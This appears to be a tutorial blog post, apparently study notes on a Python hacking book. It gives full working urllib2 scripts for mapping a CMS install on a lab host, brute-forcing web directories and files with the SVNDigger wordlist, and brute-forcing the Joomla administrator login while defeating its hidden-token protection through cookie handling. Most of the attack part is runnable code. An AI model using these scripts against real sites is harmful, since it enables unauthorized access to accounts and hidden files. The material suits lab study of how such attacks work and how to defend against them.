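The socket library of the web: urllib2

I initially named the script urllib2.py, and running it in Sublime Text raised an error. Debugging showed a name clash: the script shadowed the standard urllib2 module it was trying to import. Renaming the script fixed the problem: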

    #!/usr/bin/python
    #coding=utf-8
    import urllib2

    url = "http://www.baidu.com"

    headers = {}
    headers['User-Agent'] = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

    request = urllib2.Request(url,headers=headers)
    response = urllib2.urlopen(request)

    print response.read()
    response.close()

    # body = urllib2.urlopen("http://www.baidu.com")
    # print body.read()



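Result of running the script:

Running it in the Python interactive shell:

Because the page contains Chinese text, decode("utf-8") is called on the result of read() to decode the bytes as UTF-8 and avoid garbled output.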
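The decoding step can be tried without any network access. Below is a minimal sketch in Python 3, where urllib2 was split into urllib.request and urllib.error and read() returns bytes. The helper name decode_body and the sample bytes are made up for illustration.

```python
def decode_body(raw, encoding="utf-8"):
    """Decode the bytes returned by read() into text.

    decode_body is a hypothetical helper, not part of urllib.
    errors="replace" substitutes a marker for invalid byte sequences
    instead of raising UnicodeDecodeError.
    """
    return raw.decode(encoding, errors="replace")


# Sample bytes standing in for response.read(); no request is made here.
sample = "百度".encode("utf-8")
text = decode_body(sample)
print(len(sample), "bytes ->", len(text), "characters")
```

If the server declares a different charset, the same helper can be called with that encoding instead of the default.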

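Open-source web application installations:

The premise here is that the web server was built with an open-source CMS, and that you have downloaded a copy of the same source code yourself.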
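The idea is that every file in the local copy suggests a path worth requesting on the target. A minimal Python 3 sketch of that mapping step follows. The function name local_paths and the throwaway directory layout are hypothetical, and no requests are sent.

```python
import os
import tempfile


def local_paths(root, skip_extensions=(".jpg", ".gif", ".png", ".css")):
    """Return URL-style paths for every file under root, skipping static assets."""
    paths = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1] in skip_extensions:
                continue
            relative = os.path.relpath(os.path.join(dirpath, name), root)
            # Use forward slashes so the result can be appended to a base URL.
            paths.append("/" + relative.replace(os.sep, "/"))
    return sorted(paths)


# Build a throwaway directory tree that stands in for a downloaded CMS.
with tempfile.TemporaryDirectory() as root:
    os.makedirs(os.path.join(root, "admin"))
    for name in ("index.php", "logo.png", os.path.join("admin", "login.php")):
        open(os.path.join(root, name), "w").close()
    print(local_paths(root))
```

Each returned path would then be appended to the target's base URL and requested, and a non-error status suggests the file exists on the server as well.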



Here I use the Dunling (盾灵) CMS, which can be downloaded directly online. Its interface is shown in the figure:

Now straight to the code:

    #!/usr/bin/python
    #coding=utf-8
    import Queue
    import threading
    import os
    import urllib2

    threads = 10

    target = "http://10.10.10.144/dunling"
    directory = "/dunling"
    filters = [".jpg",".gif",".png",".css"]

    os.chdir(directory)

    web_paths = Queue.Queue()

    for r,d,f in os.walk("."):
        for files in f:
            remote_path = "%s/%s"%(r,files)
            if remote_path.startswith("."):
                remote_path = remote_path[1:]
            if os.path.splitext(files)[1] not in filters:
                web_paths.put(remote_path)

    def test_remote():
        while not web_paths.empty():
            path = web_paths.get()
            url = "%s%s"%(target,path)

            request = urllib2.Request(url)

            try:
                response = urllib2.urlopen(request)
                content = response.read()

                print "[%d] => %s"%(response.code,path)
                response.close()

            except urllib2.HTTPError as error:
                # print "Failed %s"%error.code
                pass

    for i in range(threads):
        print "Spawning thread : %d"%i
        t = threading.Thread(target=test_remote)
        t.start()

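Result of running the script:

Brute-forcing directories and file locations:

First download the wordlists from SVNDigger, a third-party brute-forcing tool: https://www.netsparker.com/blog/web-security/svn-digger-better-lists-for-forced-browsing/

Put the all.txt file from the download in a directory where the script can read it. As in the book's example, it goes in /tmp here.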

    #!/usr/bin/python
    #coding=utf-8
    import urllib2
    import threading
    import Queue
    import urllib

    threads = 50
    target_url = "http://testphp.vulnweb.com"
    wordlist_file = "/tmp/all.txt"  # from SVNDigger
    resume = None
    user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

    def build_wordlist(wordlist_file):
        # Read in the wordlist file
        fd = open(wordlist_file,"rb")
        raw_words = fd.readlines()
        fd.close()

        found_resume = False
        words = Queue.Queue()

        for word in raw_words:
            word = word.rstrip()

            if resume is not None:
                if found_resume:
                    words.put(word)
                else:
                    if word == resume:
                        found_resume = True
                        print "Resuming wordlist from: %s"%resume
            else:
                words.put(word)

        return words

    def dir_bruter(word_queue,extensions=None):
        while not word_queue.empty():
            attempt = word_queue.get()

            attempt_list = []

            # Check for a file extension; without one, the word is treated as a directory path
            if "." not in attempt:
                attempt_list.append("/%s/"%attempt)
            else:
                attempt_list.append("/%s"%attempt)

            # If we also want to brute-force extensions
            if extensions:
                for extension in extensions:
                    attempt_list.append("/%s%s"%(attempt,extension))

            # Iterate over the list of paths to try
            for brute in attempt_list:
                url = "%s%s"%(target_url,urllib.quote(brute))

                try:
                    headers = {}
                    headers["User-Agent"] = user_agent
                    r = urllib2.Request(url,headers=headers)

                    response = urllib2.urlopen(r)

                    if len(response.read()):
                        print "[%d] => %s"%(response.code,url)

                except urllib2.URLError, e:
                    # Report any HTTP error other than 404
                    if hasattr(e,'code') and e.code != 404:
                        print "!!! %d => %s"%(e.code,url)
                    pass

    word_queue = build_wordlist(wordlist_file)
    extensions = [".php",".bak",".orig",".inc"]

    for i in range(threads):
        t = threading.Thread(target=dir_bruter,args=(word_queue,extensions,))
        t.start()
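The candidate-building step inside dir_bruter can be isolated and checked without touching the network. Here is a minimal Python 3 sketch of it, where urllib.quote becomes urllib.parse.quote. The function name build_attempts is made up for illustration and does not appear in the script.

```python
from urllib.parse import quote


def build_attempts(word, extensions=None):
    """Return the URL paths to try for one wordlist entry."""
    attempts = []
    # No dot means the word is treated as a directory name.
    if "." not in word:
        attempts.append("/%s/" % word)
    else:
        attempts.append("/%s" % word)
    # Optionally try the same word with each extra extension appended.
    for extension in extensions or []:
        attempts.append("/%s%s" % (word, extension))
    # quote() percent-encodes unsafe characters; "/" is left alone by default.
    return [quote(path) for path in attempts]


print(build_attempts("admin", [".php", ".bak"]))
print(build_attempts("index.html"))
```

With four extensions, as in the script, every wordlist entry turns into five requests, which is worth keeping in mind when choosing the thread count.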

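Result of running the script:

Brute-forcing HTML form authentication:

First download and install Joomla, then open the administrator login page: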



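Right-click to view the page source and analyze the key information in the form:

As shown, the input tags for the username and password are named username and passwd. Near the end of the form there is a long random string. This is the core of Joomla's defense against brute forcing: the string is checked against the current user session, which is tracked through a cookie. The string used to confirm a successful login is the title of the returned page, "Administration - Control Panel".

Accordingly, the book's author gives the following procedure for brute-forcing Joomla:

1. Retrieve the login page and accept all cookies that are returned.

2. Parse out all of the form elements from the HTML.

3. Set the username and password fields to a guess from the wordlist.

4. Send an HTTP POST to the login processing script, including all of the HTML form fields and the stored cookies.

5. Test whether the login succeeded.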
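Steps 2 to 4 can be sketched offline as follows. This is a Python 3 illustration under stated assumptions, not the book's code: the class name InputCollector, the function build_login_data, and the sample form with its placeholder token are all hypothetical. Only the field names username and passwd come from the analysis above.

```python
from html.parser import HTMLParser
from urllib.parse import urlencode


class InputCollector(HTMLParser):
    """Collect name/value pairs from every <input> tag fed to the parser."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attributes = dict(attrs)
        name = attributes.get("name")
        if name is not None:
            # Inputs without a value attribute are recorded as empty strings.
            self.fields[name] = attributes.get("value") or ""


# Made-up login form; the hidden token name and value are placeholders.
SAMPLE_FORM = """
<form action="index.php" method="post">
  <input name="username" type="text" />
  <input name="passwd" type="password" />
  <input type="hidden" name="0123456789abcdef" value="1" />
</form>
"""


def build_login_data(page, username, password):
    """Parse the form, fill in the guess, and encode the POST body."""
    collector = InputCollector()
    collector.feed(page)
    fields = collector.fields
    fields["username"] = username
    fields["passwd"] = password
    return urlencode(fields).encode("ascii")


print(build_login_data(SAMPLE_FORM, "admin", "secret"))
```

Because the hidden token is read from the page on every attempt, the POST body always carries the value that matches the current session cookie.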

The full script is as follows:

    #!/usr/bin/python
    #coding=utf-8
    import urllib2
    import urllib
    import cookielib
    import threading
    import sys
    import Queue

    from HTMLParser import HTMLParser

    # General settings
    user_thread = 10
    username = "admin"
    wordlist_file = "/tmp/passwd.txt"
    resume = None

    # Target-specific settings
    target_url = "http://10.10.10.144/Joomla/administrator/index.php"
    target_post = "http://10.10.10.144/Joomla/administrator/index.php"

    username_field = "username"
    password_field = "passwd"

    success_check = "Administration - Control Panel"

    class Bruter(object):
        """Tries each password in the queue against the login form."""
        def __init__(self, username, words):
            self.username = username
            self.password_q = words
            self.found = False

            print "Finished setting up for: %s"%username

        def run_bruteforce(self):
            for i in range(user_thread):
                t = threading.Thread(target=self.web_bruter)
                t.start()

        def web_bruter(self):
            while not self.password_q.empty() and not self.found:
                brute = self.password_q.get().rstrip()
                jar = cookielib.FileCookieJar("cookies")
                opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

                response = opener.open(target_url)

                page = response.read()

                print "Trying: %s : %s (%d left)"%(self.username,brute,self.password_q.qsize())

                # Parse out the hidden fields
                parser = BruteParser()
                parser.feed(page)

                post_tags = parser.tag_results

                # Add our username and password fields
                post_tags[username_field] = self.username
                post_tags[password_field] = brute

                login_data = urllib.urlencode(post_tags)
                login_response = opener.open(target_post,login_data)

                login_result = login_response.read()

                if success_check in login_result:
                    self.found = True

                    print "[*] Bruteforce successful. "
                    print "[*] Username: %s"%self.username
                    print "[*] Password: %s"%brute
                    print "[*] Waiting for other threads to exit ...\n"

    class BruteParser(HTMLParser):
        """Collects the name/value pairs of all input tags."""
        def __init__(self):
            HTMLParser.__init__(self)
            self.tag_results = {}

        def handle_starttag(self,tag,attrs):
            if tag == "input":
                tag_name = None
                tag_value = None
                for name,value in attrs:
                    if name == "name":
                        tag_name = value
                    if name == "value":
                        tag_value = value

                if tag_name is not None:
                    # Store tag_value, not the loop variable value,
                    # which only holds the last attribute seen
                    self.tag_results[tag_name] = tag_value

    def build_wordlist(wordlist_file):
        fd = open(wordlist_file,"rb")
        raw_words = fd.readlines()
        fd.close()

        found_resume = False
        words = Queue.Queue()

        for word in raw_words:
            word = word.rstrip()

            if resume is not None:
                if found_resume:
                    words.put(word)
                else:
                    if word == resume:
                        found_resume = True
                        print "Resuming wordlist from: %s"%resume
            else:
                words.put(word)

        return words

    words = build_wordlist(wordlist_file)

    brute_obj = Bruter(username,words)
    brute_obj.run_bruteforce()

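The key step here is importing cookielib and creating a FileCookieJar() to hold the cookie values, with cookies as its file name. The jar is handed to urllib2's HTTPCookieProcessor(), and the resulting handler is passed to urllib2.build_opener() to create a custom opener object with cookie support.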
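For comparison, the same wiring in Python 3 looks roughly like this, with cookielib renamed to http.cookiejar and urllib2 to urllib.request. It is a minimal sketch that swaps in a plain in-memory CookieJar rather than FileCookieJar, and the function name make_cookie_opener is made up for illustration.

```python
import http.cookiejar
import urllib.request


def make_cookie_opener():
    """Return an opener that stores and resends cookies, plus its jar."""
    jar = http.cookiejar.CookieJar()  # in-memory jar; nothing is written to disk
    handler = urllib.request.HTTPCookieProcessor(jar)
    opener = urllib.request.build_opener(handler)
    return opener, jar


opener, jar = make_cookie_opener()
# No request has been made yet, so the jar starts out empty.
print(len(jar))
```

Every request made through opener.open() shares that jar, which is how the session cookie set by the first GET reaches the POST that follows.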



Result of running the script: